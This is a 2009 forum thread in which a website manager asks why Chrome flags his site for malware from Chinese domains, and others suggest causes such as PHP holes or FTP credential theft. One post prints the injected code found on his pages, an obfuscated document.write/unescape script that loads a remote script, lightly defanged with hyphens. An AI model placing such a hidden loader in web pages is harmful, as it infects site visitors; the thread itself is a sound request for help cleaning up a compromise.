Web site compromised?

Discussion in 'Computer Security' started by Kompu Kid, Apr 22, 2009.

  1. Kompu Kid

    Kompu Kid Guest

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware –
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn can be on this site? What "do"
    elements mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #1
    1. Advertisements

  2. Kompu Kid

    Kompu Kid Guest

    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #2
    1. Advertisements

  3. Kompu Kid

    Martin Guest

    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a descent answer from someone
    who bothers to go and look at the code.
     
    Martin, Apr 22, 2009
    #3
  4. Kompu Kid

    Kompu Kid Guest

    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/index.php?showtopic=26972

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #4
  5. Kompu Kid

    1PW Guest

    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
    ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
     
    1PW, Apr 22, 2009
    #5
  6. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:
    Don't expect any help then.
     
    John Holmes, Apr 22, 2009
    #6
  7. Kompu Kid

    Kompu Kid Guest

    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on a the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>
     
    Kompu Kid, Apr 22, 2009
    #7
  8. Kompu Kid

    Kompu Kid Guest

    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza
     
    Kompu Kid, Apr 23, 2009
    #8
  9. Kompu Kid

    Todd H. Guest

    PHP forums ...

    I lack the time to go there and triage it, but PHP is quite a
    playground, and forums even more so. Probably some sort of script
    injection attack if not a complete compromise.
     
    Todd H., Apr 23, 2009
    #9
  10. Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker
     
    Gandalf Parker, Apr 23, 2009
    #10
  11. Kompu Kid

    Kompu Kid Guest

    UPDATE:

    * I found also a My hosting services told me that an infection on my
    personal computer is probably where the injection of suspect codes
    have started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.
     
    Kompu Kid, Apr 23, 2009
    #11
  12. Kompu Kid

    Kompu Kid Guest

    It seems like I need to install a newsreader on my computer to use the
    "".

    Outlooked volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to chrome.

    Deguza
     
    Kompu Kid, Apr 24, 2009
    #12
  13. Kompu Kid

    Todd H. Guest

    Much agreed. PHP is so pourous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    wittle down the "how" in what happened perhaps.
     
    Todd H., Apr 24, 2009
    #13
  14. Kompu Kid

    ©Ari® Guest

    LOL
     
    ©Ari®, Apr 24, 2009
    #14
  15. Kompu Kid

    DGB Guest

    Can you/will you expand on your comment, ©Ari® ?

    Thanks
     
    DGB, Apr 24, 2009
    #15
  16. Kompu Kid

    Doc Guest

    If you're posting a message in a hacker forum with a warning that you
    think the site might be compromised, then the people who look at it are
    forewarned.

    Not posting the URL is stupid. People who can do low-tech stuff like
    telnet to the server and download the page for analysis can't do that if
    they don't know where it is.

    It's like telling someone you think you have an STD, but not going to the
    doctor to really find out.



    Doc.
     
    Doc, Apr 24, 2009
    #16
  17. Kompu Kid

    Doc Guest

    I still like X-News.

    http://download.cnet.com/Xnews/3000-2164_4-10026377.html

    Really should download and try the latest version, but the one I have just
    works - no attempts to execute code or render pages, so very safe.


    Doc.
     
    Doc, Apr 24, 2009
    #17
  18. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:
    I'll second Doc.

    Most of the regulars here know what they're doing. FYI, my system will
    not get infected by just browsing to a compromised website.
     
    John Holmes, Apr 25, 2009
    #18
  19. Kompu Kid

    ~BD~ Guest

    Hello John :)

    Please will you explain how/why *your* system will not be so infected
    yet other folk may be?

    Might it simply be because you aren't using Microsoft Windows?
     
    ~BD~, Apr 25, 2009
    #19
  20. Kompu Kid

    John Holmes Guest

    ~BD~ "contributed" in alt.hacker:
    As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
    and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
    2008 DC's running ISA server and Forefront. That setup keeps my local
    network free of mal/spy-ware, viruses and other nasties. The servers are
    really in use as servers, i.e. nobody touches them but me and no websites
    are ever visited on them.

    I hope my answer satisfied you.
     
    John Holmes, Apr 25, 2009
    #20
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.